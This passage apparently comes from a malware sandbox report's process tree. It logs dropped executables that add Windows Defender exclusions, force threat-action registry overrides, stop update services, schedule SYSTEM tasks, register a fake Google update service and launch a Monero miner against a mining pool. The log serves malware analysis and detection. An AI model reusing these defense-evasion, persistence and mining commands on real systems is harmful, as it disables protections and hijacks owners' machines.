                                                                                        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 17:45:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS4F5E.tmp\Install.exe\" it /dmkdiddrxB 385118 /S" /V1 /F
                                                                                        9⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:5872
                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                                        9⤵
                                                                                          PID:5928
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                            10⤵
                                                                                              PID:5976
                                                                                              • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                                schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                11⤵
                                                                                                  PID:5992
                                                                                        • C:\Users\Admin\Pictures\PRnI6KoIWrKO8QeZYedWMEUB.exe
                                                                                          "C:\Users\Admin\Pictures\PRnI6KoIWrKO8QeZYedWMEUB.exe"
                                                                                          7⤵
                                                                                            PID:880
                                                                                            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                              8⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              PID:5924
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                              8⤵
                                                                                                PID:1652
                                                                                                • C:\Windows\system32\wusa.exe
                                                                                                  wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                  9⤵
                                                                                                    PID:5372
                                                                                                • C:\Windows\system32\sc.exe
                                                                                                  C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                  8⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:1856
                                                                                                • C:\Windows\system32\sc.exe
                                                                                                  C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                  8⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:5516
                                                                                                • C:\Windows\system32\sc.exe
                                                                                                  C:\Windows\system32\sc.exe stop wuauserv
                                                                                                  8⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:5468
                                                                                                • C:\Windows\system32\sc.exe
                                                                                                  C:\Windows\system32\sc.exe stop bits
                                                                                                  8⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:5228
                                                                                                • C:\Windows\system32\sc.exe
                                                                                                  C:\Windows\system32\sc.exe stop dosvc
                                                                                                  8⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:5292
                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                  8⤵
                                                                                                    PID:6084
                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                    8⤵
                                                                                                      PID:4572
                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                      8⤵
                                                                                                        PID:5336
                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                        8⤵
                                                                                                          PID:5604
                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                          C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                                                                                          8⤵
                                                                                                          • Launches sc.exe
                                                                                                          PID:5704
                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                          C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                                                                                                          8⤵
                                                                                                          • Launches sc.exe
                                                                                                          PID:5016
                                                                                                      • C:\Users\Admin\Pictures\4NKkxAWloNbuJdpmQ5UCeBGU.exe
                                                                                                        "C:\Users\Admin\Pictures\4NKkxAWloNbuJdpmQ5UCeBGU.exe"
                                                                                                        7⤵
                                                                                                          PID:3952
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS6AF5.tmp\Install.exe
                                                                                                            .\Install.exe /tEdidDDf "385118" /S
                                                                                                            8⤵
                                                                                                              PID:3648
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                9⤵
                                                                                                                  PID:3184
                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                    10⤵
                                                                                                                      PID:5084
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                        11⤵
                                                                                                                          PID:4764
                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                            12⤵
                                                                                                                              PID:5016
                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                          10⤵
                                                                                                                            PID:5152
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                              11⤵
                                                                                                                                PID:5176
                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                  12⤵
                                                                                                                                    PID:5192
                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                10⤵
                                                                                                                                  PID:5208
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                    11⤵
                                                                                                                                      PID:5224
                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                        12⤵
                                                                                                                                          PID:5236
                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                      10⤵
                                                                                                                                        PID:5256
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                          11⤵
                                                                                                                                            PID:5272
                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                              12⤵
                                                                                                                                                PID:5288
                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                            10⤵
                                                                                                                                              PID:5304
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                11⤵
                                                                                                                                                  PID:5320
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                    12⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                    PID:5336
                                                                                                                                                    • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                      13⤵
                                                                                                                                                        PID:5540
                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                                                                9⤵
                                                                                                                                                  PID:4900
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                    10⤵
                                                                                                                                                      PID:5256
                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                        11⤵
                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                        PID:5396
                                                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                          12⤵
                                                                                                                                                            PID:5372
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 17:45:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS6AF5.tmp\Install.exe\" it /LdldidCDnd 385118 /S" /V1 /F
                                                                                                                                                      9⤵
                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                      PID:5232
                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                                                                                                      9⤵
                                                                                                                                                        PID:4956
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                                                          10⤵
                                                                                                                                                            PID:5632
                                                                                                                                                            • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                                                                                              schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                                                              11⤵
                                                                                                                                                                PID:396
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000014001\ac03d4ef2c.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1000014001\ac03d4ef2c.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                PID:972
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4488 -ip 4488
                                                                                                                                            1⤵
                                                                                                                                              PID:4304
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                                                              1⤵
                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                              PID:4668
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                                              1⤵
                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              PID:4308
                                                                                                                                            • C:\Program Files (x86)\GameStabilityService\GameService.exe
                                                                                                                                              "C:\Program Files (x86)\GameStabilityService\GameService.exe"
                                                                                                                                              1⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:3564
                                                                                                                                              • C:\Program Files (x86)\GameStabilityService\GameStabilityService.exe
                                                                                                                                                "C:\Program Files (x86)\GameStabilityService\GameStabilityService.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:3524
                                                                                                                                                • C:\Windows\Temp\75103.exe
                                                                                                                                                  "C:\Windows\Temp\75103.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 86Adxfq6AnkKUZNQwBuLMF9HYKxy399q4GoNvX86ddj4DNkHhKaPCWagERDeBPVYSw76hQwZATyV8GAWhX5g2ujETX6AWcp --coin XMR -t 1 --no-color -p x
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                  PID:3996
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1632 -ip 1632
                                                                                                                                              1⤵
                                                                                                                                                PID:2660
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1632 -ip 1632
                                                                                                                                                1⤵
                                                                                                                                                  PID:4940
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1632 -ip 1632
                                                                                                                                                  1⤵
                                                                                                                                                    PID:1840
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1632 -ip 1632
                                                                                                                                                    1⤵
                                                                                                                                                      PID:2988
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1632 -ip 1632
                                                                                                                                                      1⤵
                                                                                                                                                        PID:4508
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1632 -ip 1632
                                                                                                                                                        1⤵
                                                                                                                                                          PID:1604
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1632 -ip 1632
                                                                                                                                                          1⤵
                                                                                                                                                            PID:1376
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1632 -ip 1632
                                                                                                                                                            1⤵
                                                                                                                                                              PID:2980
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1632 -ip 1632
                                                                                                                                                              1⤵
                                                                                                                                                                PID:5016
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1632 -ip 1632
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:2036
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:4220
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:4752
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:2848
                                                                                                                                                                      • C:\Windows\windefender.exe
                                                                                                                                                                        C:\Windows\windefender.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:5720
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS4F5E.tmp\Install.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7zS4F5E.tmp\Install.exe it /dmkdiddrxB 385118 /S
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:6008
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:6068
                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:6112
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:6128
                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:2948
                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:5016
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:4764
                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:5084
                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:5200
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:5176
                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:5152
                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:4088
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:2108
                                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:5252
                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:1236
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:2692
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                  PID:4544
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                      PID:5332
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD 